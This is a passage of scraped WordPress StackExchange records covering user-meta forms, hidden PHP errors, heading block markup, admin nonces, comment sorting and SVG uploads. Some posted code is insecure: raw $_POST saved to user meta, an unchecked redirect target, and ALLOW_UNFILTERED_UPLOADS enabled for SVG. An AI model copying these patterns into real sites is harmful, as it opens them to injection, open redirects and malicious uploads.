}\n}\n</code></pre>\n</li>\n</ol>\n"
},
{
"answer_id": 376325,
"author": "Duke Yin",
"author_id": 148298,
"author_profile": "https://wordpress.stackexchange.com/users/148298",
"pm_score": 0,
"selected": false,
"text": "<p>First I want to thank @SallyCJ, you helped me alot:)</p>\n<p>I was modifying the code while you write the answer, and I've got a working code below.</p>\n<pre><code><?php \nfunction update_basic_user_meta() { //define this function\n$user_id = get_current_user_id(); //save the current user id number for further use \n\n?>\n\n<form name="update_basic_user_meta" id="update_basic_user_meta" action="" method="POST"> <!-- figured out should be empty on "action" -->\n\n <input name="nickname" type="text" placeholder="<?php _e('Your name here','journey');?>"> <!-- A text field to get user's nickname change -->\n\n <select name="gender"> <!-- An select to tell is it he or her -->\n <option value="male" ><?php _e('Male','journey');?></option>\n <option value="female" ><?php _e('Female','journey');?></option> \n </select>\n\n <div> <!-- Radio buttons to select what they are good at -->\n <label><input class="uk-radio" type="radio" name="specialty" value="0"> <?php _e('Strong','journey');?></label><br>\n <label><input class="uk-radio" type="radio" name="specialty" value="1"> <?php _e('Balanced','journey');?></label><br>\n <label><input class="uk-radio" type="radio" name="specialty" value="2"> <?php _e('Wise','journey');?></label>\n </div>\n \n <button name="submit" class="uk-button uk-button-primary uk-width-1 uk-margin-small-bottom" type="submit"><?php _e('Inject Soul','journey');?></button>\n\n</form>\n<?php\n if($_POST['nickname'] != ''){ //check one of the field is filled then go, prevent empty stuff goes to database.\n update_user_meta( $user_id, 'nickname', $_POST['nickname'] ); //Save Nickname\n update_user_meta( $user_id, 'gender', $_POST['gender'] ); //Save Gender\n update_user_meta( $user_id, 'specialty', $_POST['specialty'] ); //Save Specialty\n }\n} //end the function\nupdate_basic_user_meta(); //call to the function\nadd_action('init', 'update_basic_user_meta'); // don't know is this necessary after calling the function but still add action of this function.\n?>\n</code></pre>\n<p>Don't know if this is the right way, the main idea is, warp the form arround in a php function, then call to the function to let the form show up, when submit the form, php get the data with $_POST[].</p>\n<p>As you @SallyCJ mentioned users should see what's already in the profile, thanks, indeed I will go further to add the get_user_meta() part to the form.</p>\n<p>That's the progress I've got sofar, not pretty but it works.</p>\n<p>Any way, should I call to add_action() again after call to(execute) the function? Still bothers me haha.</p>\n<p>Thank you again. Really learned alot from your answer.</p>\n"
}
] | 2020/10/12 | [
"https://wordpress.stackexchange.com/questions/376317",
"https://wordpress.stackexchange.com",
"https://wordpress.stackexchange.com/users/194049/"
] | I'm being faced very often when I typically go into a saved draft, edit a post and then save it. I'm getting the error:
>
> Updating failed. The response is not a valid JSON response.
>
>
>
I'm finding that I can often publish, but if I continue to save as a draft, I may or may not get what I was expecting. I'm seeing titles disappear and other pieces of content. I have reached out to Wordpress and was told to change the 'permalinks' settings and then change back again. This did not work. I was also told to roll back to classic editor, which seems to work, but I want to continue using blocks. How can I resolve this issue without having to downgrade wordpress for our writers?
As was suggested here is the debug below
```
Exception { name: "NS_ERROR_FAILURE", message: "", result: 2147500037, filename: "https://example.com/libby-heaney-bridges-the-gap-be…ormer-quantum-scientist-she-is-now-a-full-time-artist/embed/", lineNumber: 8, columnNumber: 0, data: null, stack: "l@https://example.com/libby-heaney-bridges-the-gap-between-science-and-art-a-former-quantum-scientist-she-is-now-a-full-time-artist/embed/:8:385\n@https://example.com/libby-heaney-bridges-the-gap-between-science-and-art-a-former-quantum-scientist-she-is-now-a-full-time-artist/embed/:8:1110\n@https://example.com/libby-heaney-bridges-the-gap-between-science-and-art-a-former-quantum-scientist-she-is-now-a-full-time-artist/embed/:8:1788\n" }
``` | There are 3 main issues in your code:
1. I see you're using `current_user_id()` which does not exist in WordPress, so I believe that should be [`get_current_user_id()`](https://developer.wordpress.org/reference/functions/get_current_user_id/).
2. Your `update_basic_user_meta()` function basically would work in updating the user's metadata, but you need to check whether the POST data (`gender` and `specialty`) are actually set before proceeding to update the metadata, and that the GET data named `update_basic_user_meta` is also set, which means the form was submitted.
However, if I were you, I would use a [nonce field](https://developer.wordpress.org/reference/functions/wp_nonce_field/) than a simple GET query.
3. You need to highlight the current selection for the "Gender" and "Specialty" options, so that users know what have they selected and whether it was actually saved. So,
* For the "Gender" option (which uses `select` menu), you can use [`selected()`](https://developer.wordpress.org/reference/functions/selected/).
* For the "Specialty" option (which uses `radio` buttons), you can use [`checked()`](https://developer.wordpress.org/reference/functions/checked/).
And despite `add_filter()` works, `init` is an action hook, so you should use `add_action()`:
```php
add_action( 'init', 'update_basic_user_meta' ); // use this
//add_filter( 'init', 'update_basic_user_meta' ); // not this
```
### Sample snippets that would make your form works as expected
1. Highlight the current selection for the "Gender" option:
```html
<?php $gender = get_user_meta( get_current_user_id(), 'gender', true ); ?>
<select name="gender">
<option value="male"<?php selected( 'male', $gender ); ?>><?php _e( 'Male', 'text-domain' ); ?></option>
<option value="female"<?php selected( 'female', $gender ); ?>><?php _e( 'Female', 'text-domain' ); ?></option>
</select>
```
2. Highlight the current selection for the "Specialty" option:
```html
<?php $specialty = get_user_meta( get_current_user_id(), 'specialty', true ); ?>
<div>
<label><input type="radio" name="specialty" value="0"<?php checked( '0', $specialty ); ?>> <?php _e( 'Read', 'text-domain' ); ?></label><br>
<label><input type="radio" name="specialty" value="1"<?php checked( '1', $specialty ); ?>> <?php _e( 'Write', 'text-domain' ); ?></label><br>
<label><input type="radio" name="specialty" value="2"<?php checked( '2', $specialty ); ?>> <?php _e( 'Translate', 'text-domain' ); ?></label>
</div>
```
3. Function to update the user's metadata:
```php
function update_basic_user_meta() {
if ( ! empty( $_GET['update_basic_user_meta'] ) &&
isset( $_POST['gender'], $_POST['specialty'] ) &&
$user_id = get_current_user_id()
) {
update_user_meta( $user_id, 'gender', sanitize_text_field( $_POST['gender'] ) );
update_user_meta( $user_id, 'specialty', sanitize_text_field( $_POST['specialty'] ) );
if ( ! empty( $_POST['redirect_to'] ) ) {
wp_redirect( $_POST['redirect_to'] );
exit;
}
}
}
``` |
376,430 | <p>After the recent update of WordPress, version 5.5.1.</p>
<p>Whenever I enabled the debug mode, there is a 2em gap between WordPress admin menu and the bar.</p>
<pre><code>.php-error #adminmenuback, .php-error #adminmenuwrap {
margin-top: 2em;
}
</code></pre>
<p>Found out that this is showing because there is a hidden error somewhere on the website?</p>
<p>How I could show that error?</p>
| [
{
"answer_id": 376431,
"author": "Mocsid",
"author_id": 196053,
"author_profile": "https://wordpress.stackexchange.com/users/196053",
"pm_score": 1,
"selected": true,
"text": "<p>---Fix---</p>\n<p>That CSS gap will only show when there is a "Hidden" error.</p>\n<p>If these conditions are true,</p>\n<pre><code>if ( $error && WP_DEBUG && WP_DEBUG_DISPLAY && ini_get( 'display_errors' )\n</code></pre>\n<p>the gap will show, it means that <strong>$error</strong> variable is not empty, we should show the value in a log file.</p>\n<p>To solve this issue, we need to show that hidden error by adding this code..</p>\n<pre><code>wp-admin/admin-header.php on line 201\n\n\n$error = error_get_last();\nerror_log('===================This is the hidden error==================');\nerror_log(print_r($error,true));\nerror_log('=================Error Setting display======================');\nerror_log('WP_DEBUG');\nerror_log(print_r(WP_DEBUG ,true));\nerror_log('WP_DEBUG_DISPLAY');\nerror_log(print_r(WP_DEBUG_DISPLAY,true));\nerror_log('display_errors ini setting');\nerror_log(print_r(ini_get( 'display_errors' ),true));\n</code></pre>\n<p>After checking the <strong>debug.log</strong>, we can now see and fix the error.</p>\n<p>This is related to this issue <a href=\"https://wordpress.stackexchange.com/questions/372897/how-to-fix-the-admin-menu-margin-top-bug-in-wordpress-5-5\">How to fix the admin menu margin-top bug in WordPress 5.5?</a> and my answer also resolved it...</p>\n"
},
{
"answer_id": 376446,
"author": "Nour Edin Al-Habal",
"author_id": 97257,
"author_profile": "https://wordpress.stackexchange.com/users/97257",
"pm_score": 2,
"selected": false,
"text": "<p>One way to do that is to enable <a href=\"https://wordpress.org/support/article/debugging-in-wordpress/#wp_debug_log\" rel=\"nofollow noreferrer\">WP_DEBUG_LOG</a> in <code>wp-config.php</code>. The file will look like this:</p>\n<pre><code>define( 'WP_DEBUG', true );\ndefine( 'WP_DEBUG_DISPLAY', false );\ndefine( 'WP_DEBUG_LOG', true ); //You may also set the log file path instead of just true\n</code></pre>\n<p>Defining WP_DEBUG_LOG as true will save logs under <code>wp-content/debug.log</code> and you'll find the PHP errors there.</p>\n"
}
] | 2020/10/14 | [
"https://wordpress.stackexchange.com/questions/376430",
"https://wordpress.stackexchange.com",
"https://wordpress.stackexchange.com/users/196053/"
] | After the recent update of WordPress, version 5.5.1.
Whenever I enabled the debug mode, there is a 2em gap between WordPress admin menu and the bar.
```
.php-error #adminmenuback, .php-error #adminmenuwrap {
margin-top: 2em;
}
```
Found out that this is showing because there is a hidden error somewhere on the website?
How I could show that error? | ---Fix---
That CSS gap will only show when there is a "Hidden" error.
If these conditions are true,
```
if ( $error && WP_DEBUG && WP_DEBUG_DISPLAY && ini_get( 'display_errors' )
```
the gap will show, it means that **$error** variable is not empty, we should show the value in a log file.
To solve this issue, we need to show that hidden error by adding this code..
```
wp-admin/admin-header.php on line 201
$error = error_get_last();
error_log('===================This is the hidden error==================');
error_log(print_r($error,true));
error_log('=================Error Setting display======================');
error_log('WP_DEBUG');
error_log(print_r(WP_DEBUG ,true));
error_log('WP_DEBUG_DISPLAY');
error_log(print_r(WP_DEBUG_DISPLAY,true));
error_log('display_errors ini setting');
error_log(print_r(ini_get( 'display_errors' ),true));
```
After checking the **debug.log**, we can now see and fix the error.
This is related to this issue [How to fix the admin menu margin-top bug in WordPress 5.5?](https://wordpress.stackexchange.com/questions/372897/how-to-fix-the-admin-menu-margin-top-bug-in-wordpress-5-5) and my answer also resolved it... |
376,440 | <p>I want to edit the <code>core/heading</code> block so it changes it's markup from
<code><h1>Hello world</h1></code> to <code><h1><span>Hello world</span></h1></code>. Note the <code><span></code> element in between.</p>
<p>The code below does not work as it should. It adds the span outside the block, as a wrapper.
<code><span><h1>Hello world</h1></span></code>. Is there a way to alter the <code><BlockEdit/></code> element? And goal should be to not add the span element into the content field.</p>
<p>Thought, if altering the edit part, should I also mirror this on the save part?</p>
<pre><code>const { createHigherOrderComponent } = wp.compose;
const { Fragment } = wp.element;
const { InspectorControls } = wp.blockEditor;
const { PanelBody } = wp.components;
const withInspectorControls = createHigherOrderComponent( ( BlockEdit ) => {
return ( props ) => {
if (props.name !== "core/heading") {
return <BlockEdit { ...props } />;
}
return (
<Fragment>
<span>
<BlockEdit { ...props } />
</span>
</Fragment>
);
};
}, "withInspectorControl" );
wp.hooks.addFilter( 'editor.BlockEdit', 'my-plugin/with-inspector-controls', withInspectorControls );
</code></pre>
| [
{
"answer_id": 376444,
"author": "kraftner",
"author_id": 47733,
"author_profile": "https://wordpress.stackexchange.com/users/47733",
"pm_score": 3,
"selected": true,
"text": "<p>Unfortunately there is now way to alter the markup of an existing block apart from <em>wrapping</em> it in additional markup:</p>\n<blockquote>\n<p>It receives the original block BlockEdit component and returns a new wrapped component.\nSource: <a href=\"https://developer.wordpress.org/block-editor/developers/filters/block-filters/#editor-blockedit\" rel=\"nofollow noreferrer\">https://developer.wordpress.org/block-editor/developers/filters/block-filters/#editor-blockedit</a></p>\n</blockquote>\n<p>To achieve what you want in the editor currently the only way would be to create your own version of the heading block replacing the core one.</p>\n<p>But what you can do, and probably is the better way to do it anyway since you leave the default markup in the DB in place, is change the markup on render using the <a href=\"https://developer.wordpress.org/reference/hooks/render_block/\" rel=\"nofollow noreferrer\"><code>render_block</code></a> filter.</p>\n<p>You can then either use regular expressions or something more solid like a DOM Parser (e.g. <a href=\"https://github.com/wasinger/htmlpagedom\" rel=\"nofollow noreferrer\">https://github.com/wasinger/htmlpagedom</a>) to alter the markup on output any way you like.</p>\n<pre><code><?php\nadd_filter('render_block', function ($blockContent, $block) {\n\n if ($block['blockName'] !== 'core/heading') {\n return $blockContent;\n } \n\n $pattern = '/(<h[^>]*>)(.*)(<\\/h[1-7]{1}>)/i';\n $replacement = '$1<span>$2</span>$3';\n return preg_replace($pattern, $replacement, $blockContent);\n\n}, 10, 2);\n</code></pre>\n<p>I've also written <a href=\"https://kraftner.com/en/blog/the-taming-of-the-block-part-ii-the-practical-part/#post-processing-with-render-filters\" rel=\"nofollow noreferrer\">a blog post</a> on various ways to configure Gutenberg that also covers the <code>render_block</code> filter and some reasoning around it in case you want to dig deeper.</p>\n"
},
{
"answer_id": 386386,
"author": "Lovor",
"author_id": 135704,
"author_profile": "https://wordpress.stackexchange.com/users/135704",
"pm_score": 0,
"selected": false,
"text": "<p>It is possible to do just that by using <code>blocks.registerBlockType</code> filter. For a detailed explanation, refer <a href=\"https://jschof.com/gutenberg-blocks/using-gutenberg-filters-to-extend-blocks/\" rel=\"nofollow noreferrer\">to this article by Jim Schofield</a></p>\n<p>However, instead of calling default edit and save functions wrapped in custom code (like in the article), do not call them, just provide your own code.</p>\n"
}
] | 2020/10/14 | [
"https://wordpress.stackexchange.com/questions/376440",
"https://wordpress.stackexchange.com",
"https://wordpress.stackexchange.com/users/152589/"
] | I want to edit the `core/heading` block so it changes it's markup from
`<h1>Hello world</h1>` to `<h1><span>Hello world</span></h1>`. Note the `<span>` element in between.
The code below does not work as it should. It adds the span outside the block, as a wrapper.
`<span><h1>Hello world</h1></span>`. Is there a way to alter the `<BlockEdit/>` element? And goal should be to not add the span element into the content field.
Thought, if altering the edit part, should I also mirror this on the save part?
```
const { createHigherOrderComponent } = wp.compose;
const { Fragment } = wp.element;
const { InspectorControls } = wp.blockEditor;
const { PanelBody } = wp.components;
const withInspectorControls = createHigherOrderComponent( ( BlockEdit ) => {
return ( props ) => {
if (props.name !== "core/heading") {
return <BlockEdit { ...props } />;
}
return (
<Fragment>
<span>
<BlockEdit { ...props } />
</span>
</Fragment>
);
};
}, "withInspectorControl" );
wp.hooks.addFilter( 'editor.BlockEdit', 'my-plugin/with-inspector-controls', withInspectorControls );
``` | Unfortunately there is now way to alter the markup of an existing block apart from *wrapping* it in additional markup:
>
> It receives the original block BlockEdit component and returns a new wrapped component.
> Source: <https://developer.wordpress.org/block-editor/developers/filters/block-filters/#editor-blockedit>
>
>
>
To achieve what you want in the editor currently the only way would be to create your own version of the heading block replacing the core one.
But what you can do, and probably is the better way to do it anyway since you leave the default markup in the DB in place, is change the markup on render using the [`render_block`](https://developer.wordpress.org/reference/hooks/render_block/) filter.
You can then either use regular expressions or something more solid like a DOM Parser (e.g. <https://github.com/wasinger/htmlpagedom>) to alter the markup on output any way you like.
```
<?php
add_filter('render_block', function ($blockContent, $block) {
if ($block['blockName'] !== 'core/heading') {
return $blockContent;
}
$pattern = '/(<h[^>]*>)(.*)(<\/h[1-7]{1}>)/i';
$replacement = '$1<span>$2</span>$3';
return preg_replace($pattern, $replacement, $blockContent);
}, 10, 2);
```
I've also written [a blog post](https://kraftner.com/en/blog/the-taming-of-the-block-part-ii-the-practical-part/#post-processing-with-render-filters) on various ways to configure Gutenberg that also covers the `render_block` filter and some reasoning around it in case you want to dig deeper. |
376,531 | <p>I am workin on a plugin (for use on my own site). I recently added a button to the admin page that generates some text, and it works fine. This is what I use (pilfered from examples):</p>
<pre><code>if (!current_user_can('manage_options')) {
wp_die( __('You do not have sufficient galooph to access this page.') );
}
if ($_POST['plugin_button'] == 'thing' && check_admin_referer('thing_button_clicked')) {
plugin_thing_button();
}
echo '<form action="options-general.php?page=plugin-list" method="post">';
wp_nonce_field('thing_button_clicked');
echo '<input type="hidden" value="thing" name="plugin_button" />';
submit_button('Generate new thing');
echo '</form>';
</code></pre>
<p>This works fine and calls the function as it should.</p>
<p>Now I want a second button to do something completely unrelated.</p>
<p>Here is what I tried, basically copying from above:</p>
<pre><code>if (!current_user_can('manage_options')) {
wp_die( __('You do not have sufficient galooph to access this page.') );
}
if ($_POST['plugin_button'] == 'thing' && check_admin_referer('thing_button_clicked')) {
plugin_thing_button();
}
if ($_POST['plugin_button2'] == 'thing2' && check_admin_referer('thing2_button_clicked')) {
plugin_thing2_button();
}
echo '<form action="options-general.php?page=plugin-list" method="post">';
wp_nonce_field('thing_button_clicked');
echo '<input type="hidden" value="thing" name="plugin_button" />';
submit_button('Generate new thing');
wp_nonce_field('thing2_button_clicked');
echo '<input type="hidden" value="thing2" name="plugin_button2" />';
submit_button('Generate new new thing');
echo '</form>';
</code></pre>
<p>The code for 2 buttons returns "The link you followed has expired." for both buttons, i.e. the one that worked alone does not work either now.</p>
<p>Where is my mistake? Thank you in advance!</p>
| [
{
"answer_id": 376444,
"author": "kraftner",
"author_id": 47733,
"author_profile": "https://wordpress.stackexchange.com/users/47733",
"pm_score": 3,
"selected": true,
"text": "<p>Unfortunately there is now way to alter the markup of an existing block apart from <em>wrapping</em> it in additional markup:</p>\n<blockquote>\n<p>It receives the original block BlockEdit component and returns a new wrapped component.\nSource: <a href=\"https://developer.wordpress.org/block-editor/developers/filters/block-filters/#editor-blockedit\" rel=\"nofollow noreferrer\">https://developer.wordpress.org/block-editor/developers/filters/block-filters/#editor-blockedit</a></p>\n</blockquote>\n<p>To achieve what you want in the editor currently the only way would be to create your own version of the heading block replacing the core one.</p>\n<p>But what you can do, and probably is the better way to do it anyway since you leave the default markup in the DB in place, is change the markup on render using the <a href=\"https://developer.wordpress.org/reference/hooks/render_block/\" rel=\"nofollow noreferrer\"><code>render_block</code></a> filter.</p>\n<p>You can then either use regular expressions or something more solid like a DOM Parser (e.g. <a href=\"https://github.com/wasinger/htmlpagedom\" rel=\"nofollow noreferrer\">https://github.com/wasinger/htmlpagedom</a>) to alter the markup on output any way you like.</p>\n<pre><code><?php\nadd_filter('render_block', function ($blockContent, $block) {\n\n if ($block['blockName'] !== 'core/heading') {\n return $blockContent;\n } \n\n $pattern = '/(<h[^>]*>)(.*)(<\\/h[1-7]{1}>)/i';\n $replacement = '$1<span>$2</span>$3';\n return preg_replace($pattern, $replacement, $blockContent);\n\n}, 10, 2);\n</code></pre>\n<p>I've also written <a href=\"https://kraftner.com/en/blog/the-taming-of-the-block-part-ii-the-practical-part/#post-processing-with-render-filters\" rel=\"nofollow noreferrer\">a blog post</a> on various ways to configure Gutenberg that also covers the <code>render_block</code> filter and some reasoning around it in case you want to dig deeper.</p>\n"
},
{
"answer_id": 386386,
"author": "Lovor",
"author_id": 135704,
"author_profile": "https://wordpress.stackexchange.com/users/135704",
"pm_score": 0,
"selected": false,
"text": "<p>It is possible to do just that by using <code>blocks.registerBlockType</code> filter. For a detailed explanation, refer <a href=\"https://jschof.com/gutenberg-blocks/using-gutenberg-filters-to-extend-blocks/\" rel=\"nofollow noreferrer\">to this article by Jim Schofield</a></p>\n<p>However, instead of calling default edit and save functions wrapped in custom code (like in the article), do not call them, just provide your own code.</p>\n"
}
] | 2020/10/15 | [
"https://wordpress.stackexchange.com/questions/376531",
"https://wordpress.stackexchange.com",
"https://wordpress.stackexchange.com/users/196127/"
] | I am workin on a plugin (for use on my own site). I recently added a button to the admin page that generates some text, and it works fine. This is what I use (pilfered from examples):
```
if (!current_user_can('manage_options')) {
wp_die( __('You do not have sufficient galooph to access this page.') );
}
if ($_POST['plugin_button'] == 'thing' && check_admin_referer('thing_button_clicked')) {
plugin_thing_button();
}
echo '<form action="options-general.php?page=plugin-list" method="post">';
wp_nonce_field('thing_button_clicked');
echo '<input type="hidden" value="thing" name="plugin_button" />';
submit_button('Generate new thing');
echo '</form>';
```
This works fine and calls the function as it should.
Now I want a second button to do something completely unrelated.
Here is what I tried, basically copying from above:
```
if (!current_user_can('manage_options')) {
wp_die( __('You do not have sufficient galooph to access this page.') );
}
if ($_POST['plugin_button'] == 'thing' && check_admin_referer('thing_button_clicked')) {
plugin_thing_button();
}
if ($_POST['plugin_button2'] == 'thing2' && check_admin_referer('thing2_button_clicked')) {
plugin_thing2_button();
}
echo '<form action="options-general.php?page=plugin-list" method="post">';
wp_nonce_field('thing_button_clicked');
echo '<input type="hidden" value="thing" name="plugin_button" />';
submit_button('Generate new thing');
wp_nonce_field('thing2_button_clicked');
echo '<input type="hidden" value="thing2" name="plugin_button2" />';
submit_button('Generate new new thing');
echo '</form>';
```
The code for 2 buttons returns "The link you followed has expired." for both buttons, i.e. the one that worked alone does not work either now.
Where is my mistake? Thank you in advance! | Unfortunately there is now way to alter the markup of an existing block apart from *wrapping* it in additional markup:
>
> It receives the original block BlockEdit component and returns a new wrapped component.
> Source: <https://developer.wordpress.org/block-editor/developers/filters/block-filters/#editor-blockedit>
>
>
>
To achieve what you want in the editor currently the only way would be to create your own version of the heading block replacing the core one.
But what you can do, and probably is the better way to do it anyway since you leave the default markup in the DB in place, is change the markup on render using the [`render_block`](https://developer.wordpress.org/reference/hooks/render_block/) filter.
You can then either use regular expressions or something more solid like a DOM Parser (e.g. <https://github.com/wasinger/htmlpagedom>) to alter the markup on output any way you like.
```
<?php
add_filter('render_block', function ($blockContent, $block) {
if ($block['blockName'] !== 'core/heading') {
return $blockContent;
}
$pattern = '/(<h[^>]*>)(.*)(<\/h[1-7]{1}>)/i';
$replacement = '$1<span>$2</span>$3';
return preg_replace($pattern, $replacement, $blockContent);
}, 10, 2);
```
I've also written [a blog post](https://kraftner.com/en/blog/the-taming-of-the-block-part-ii-the-practical-part/#post-processing-with-render-filters) on various ways to configure Gutenberg that also covers the `render_block` filter and some reasoning around it in case you want to dig deeper. |
376,539 | <p>I am writing a plugin that will allow simple comment upvoting.</p>
<p>I am trying to sort comments by the number of upvotes. But anything I do on the comments_array Hook gets somehow reset. My question is where and how?</p>
<p>Here is my code:</p>
<pre><code>add_filter( 'comments_array', 'biiird_order_comments_by_likes' );
function biiird_order_comments_by_likes( $array ) {
$arraya = $array;
usort($arraya, function($a, $b) {
$likes_a = get_comment_meta( $a->comment_ID, 'likes', true );
$likes_b = get_comment_meta( $b->comment_ID, 'likes', true );
return ($likes_a > $likes_b) ? -1 : 1;
});
foreach ( $arraya as $comment ) {
$comment->comment_content .= 'something';
}
var_dump($arraya);
var_dump($array);
return $arraya;
}
</code></pre>
<p>The <code>var_dump($arraya)</code> outputs a modified array in the proper order, but the comments show on a page as if the filter was not run.</p>
| [
{
"answer_id": 376444,
"author": "kraftner",
"author_id": 47733,
"author_profile": "https://wordpress.stackexchange.com/users/47733",
"pm_score": 3,
"selected": true,
"text": "<p>Unfortunately there is now way to alter the markup of an existing block apart from <em>wrapping</em> it in additional markup:</p>\n<blockquote>\n<p>It receives the original block BlockEdit component and returns a new wrapped component.\nSource: <a href=\"https://developer.wordpress.org/block-editor/developers/filters/block-filters/#editor-blockedit\" rel=\"nofollow noreferrer\">https://developer.wordpress.org/block-editor/developers/filters/block-filters/#editor-blockedit</a></p>\n</blockquote>\n<p>To achieve what you want in the editor currently the only way would be to create your own version of the heading block replacing the core one.</p>\n<p>But what you can do, and probably is the better way to do it anyway since you leave the default markup in the DB in place, is change the markup on render using the <a href=\"https://developer.wordpress.org/reference/hooks/render_block/\" rel=\"nofollow noreferrer\"><code>render_block</code></a> filter.</p>\n<p>You can then either use regular expressions or something more solid like a DOM Parser (e.g. <a href=\"https://github.com/wasinger/htmlpagedom\" rel=\"nofollow noreferrer\">https://github.com/wasinger/htmlpagedom</a>) to alter the markup on output any way you like.</p>\n<pre><code><?php\nadd_filter('render_block', function ($blockContent, $block) {\n\n if ($block['blockName'] !== 'core/heading') {\n return $blockContent;\n } \n\n $pattern = '/(<h[^>]*>)(.*)(<\\/h[1-7]{1}>)/i';\n $replacement = '$1<span>$2</span>$3';\n return preg_replace($pattern, $replacement, $blockContent);\n\n}, 10, 2);\n</code></pre>\n<p>I've also written <a href=\"https://kraftner.com/en/blog/the-taming-of-the-block-part-ii-the-practical-part/#post-processing-with-render-filters\" rel=\"nofollow noreferrer\">a blog post</a> on various ways to configure Gutenberg that also covers the <code>render_block</code> filter and some reasoning around it in case you want to dig deeper.</p>\n"
},
{
"answer_id": 386386,
"author": "Lovor",
"author_id": 135704,
"author_profile": "https://wordpress.stackexchange.com/users/135704",
"pm_score": 0,
"selected": false,
"text": "<p>It is possible to do just that by using <code>blocks.registerBlockType</code> filter. For a detailed explanation, refer <a href=\"https://jschof.com/gutenberg-blocks/using-gutenberg-filters-to-extend-blocks/\" rel=\"nofollow noreferrer\">to this article by Jim Schofield</a></p>\n<p>However, instead of calling default edit and save functions wrapped in custom code (like in the article), do not call them, just provide your own code.</p>\n"
}
] | 2020/10/15 | [
"https://wordpress.stackexchange.com/questions/376539",
"https://wordpress.stackexchange.com",
"https://wordpress.stackexchange.com/users/194463/"
] | I am writing a plugin that will allow simple comment upvoting.
I am trying to sort comments by the number of upvotes. But anything I do on the comments\_array Hook gets somehow reset. My question is where and how?
Here is my code:
```
add_filter( 'comments_array', 'biiird_order_comments_by_likes' );
function biiird_order_comments_by_likes( $array ) {
$arraya = $array;
usort($arraya, function($a, $b) {
$likes_a = get_comment_meta( $a->comment_ID, 'likes', true );
$likes_b = get_comment_meta( $b->comment_ID, 'likes', true );
return ($likes_a > $likes_b) ? -1 : 1;
});
foreach ( $arraya as $comment ) {
$comment->comment_content .= 'something';
}
var_dump($arraya);
var_dump($array);
return $arraya;
}
```
The `var_dump($arraya)` outputs a modified array in the proper order, but the comments show on a page as if the filter was not run. | Unfortunately there is now way to alter the markup of an existing block apart from *wrapping* it in additional markup:
>
> It receives the original block BlockEdit component and returns a new wrapped component.
> Source: <https://developer.wordpress.org/block-editor/developers/filters/block-filters/#editor-blockedit>
>
>
>
To achieve what you want in the editor currently the only way would be to create your own version of the heading block replacing the core one.
But what you can do, and probably is the better way to do it anyway since you leave the default markup in the DB in place, is change the markup on render using the [`render_block`](https://developer.wordpress.org/reference/hooks/render_block/) filter.
You can then either use regular expressions or something more solid like a DOM Parser (e.g. <https://github.com/wasinger/htmlpagedom>) to alter the markup on output any way you like.
```
<?php
add_filter('render_block', function ($blockContent, $block) {
if ($block['blockName'] !== 'core/heading') {
return $blockContent;
}
$pattern = '/(<h[^>]*>)(.*)(<\/h[1-7]{1}>)/i';
$replacement = '$1<span>$2</span>$3';
return preg_replace($pattern, $replacement, $blockContent);
}, 10, 2);
```
I've also written [a blog post](https://kraftner.com/en/blog/the-taming-of-the-block-part-ii-the-practical-part/#post-processing-with-render-filters) on various ways to configure Gutenberg that also covers the `render_block` filter and some reasoning around it in case you want to dig deeper. |
376,553 | <p>I addes this code to allow SVG Uploads to the Media Library of wordpress:</p>
<pre><code>function upload_svg ( $svg_mime ){
$svg_mime['svg'] = 'image/svg+xml';
return $svg_mime;
}
add_filter( 'upload_mimes', 'upload_svg' );
define('ALLOW_UNFILTERED_UPLOADS', true);
</code></pre>
<p>Than I added some SVGs to the Media Library. Using them works perfectly fine. The only Issue I have is that they will not be displayed in the Media Library. On other Pages in the Backend they display fine.</p>
<p>Is there anything I can do to display them in the Media Tab aswell? I couln't find anything online on how to fix this issue.</p>
| [
{
"answer_id": 376444,
"author": "kraftner",
"author_id": 47733,
"author_profile": "https://wordpress.stackexchange.com/users/47733",
"pm_score": 3,
"selected": true,
"text": "<p>Unfortunately there is now way to alter the markup of an existing block apart from <em>wrapping</em> it in additional markup:</p>\n<blockquote>\n<p>It receives the original block BlockEdit component and returns a new wrapped component.\nSource: <a href=\"https://developer.wordpress.org/block-editor/developers/filters/block-filters/#editor-blockedit\" rel=\"nofollow noreferrer\">https://developer.wordpress.org/block-editor/developers/filters/block-filters/#editor-blockedit</a></p>\n</blockquote>\n<p>To achieve what you want in the editor currently the only way would be to create your own version of the heading block replacing the core one.</p>\n<p>But what you can do, and probably is the better way to do it anyway since you leave the default markup in the DB in place, is change the markup on render using the <a href=\"https://developer.wordpress.org/reference/hooks/render_block/\" rel=\"nofollow noreferrer\"><code>render_block</code></a> filter.</p>\n<p>You can then either use regular expressions or something more solid like a DOM Parser (e.g. <a href=\"https://github.com/wasinger/htmlpagedom\" rel=\"nofollow noreferrer\">https://github.com/wasinger/htmlpagedom</a>) to alter the markup on output any way you like.</p>\n<pre><code><?php\nadd_filter('render_block', function ($blockContent, $block) {\n\n if ($block['blockName'] !== 'core/heading') {\n return $blockContent;\n } \n\n $pattern = '/(<h[^>]*>)(.*)(<\\/h[1-7]{1}>)/i';\n $replacement = '$1<span>$2</span>$3';\n return preg_replace($pattern, $replacement, $blockContent);\n\n}, 10, 2);\n</code></pre>\n<p>I've also written <a href=\"https://kraftner.com/en/blog/the-taming-of-the-block-part-ii-the-practical-part/#post-processing-with-render-filters\" rel=\"nofollow noreferrer\">a blog post</a> on various ways to configure Gutenberg that also covers the <code>render_block</code> filter and some reasoning around it in case you want to dig deeper.</p>\n"
},
{
"answer_id": 386386,
"author": "Lovor",
"author_id": 135704,
"author_profile": "https://wordpress.stackexchange.com/users/135704",
"pm_score": 0,
"selected": false,
"text": "<p>It is possible to do just that by using <code>blocks.registerBlockType</code> filter. For a detailed explanation, refer <a href=\"https://jschof.com/gutenberg-blocks/using-gutenberg-filters-to-extend-blocks/\" rel=\"nofollow noreferrer\">to this article by Jim Schofield</a></p>\n<p>However, instead of calling default edit and save functions wrapped in custom code (like in the article), do not call them, just provide your own code.</p>\n"
}
] | 2020/10/15 | [
"https://wordpress.stackexchange.com/questions/376553",
"https://wordpress.stackexchange.com",
"https://wordpress.stackexchange.com/users/112177/"
] | I addes this code to allow SVG Uploads to the Media Library of wordpress:
```
function upload_svg ( $svg_mime ){
$svg_mime['svg'] = 'image/svg+xml';
return $svg_mime;
}
add_filter( 'upload_mimes', 'upload_svg' );
define('ALLOW_UNFILTERED_UPLOADS', true);
```
Than I added some SVGs to the Media Library. Using them works perfectly fine. The only Issue I have is that they will not be displayed in the Media Library. On other Pages in the Backend they display fine.
Is there anything I can do to display them in the Media Tab aswell? I couln't find anything online on how to fix this issue. | Unfortunately there is now way to alter the markup of an existing block apart from *wrapping* it in additional markup:
>
> It receives the original block BlockEdit component and returns a new wrapped component.
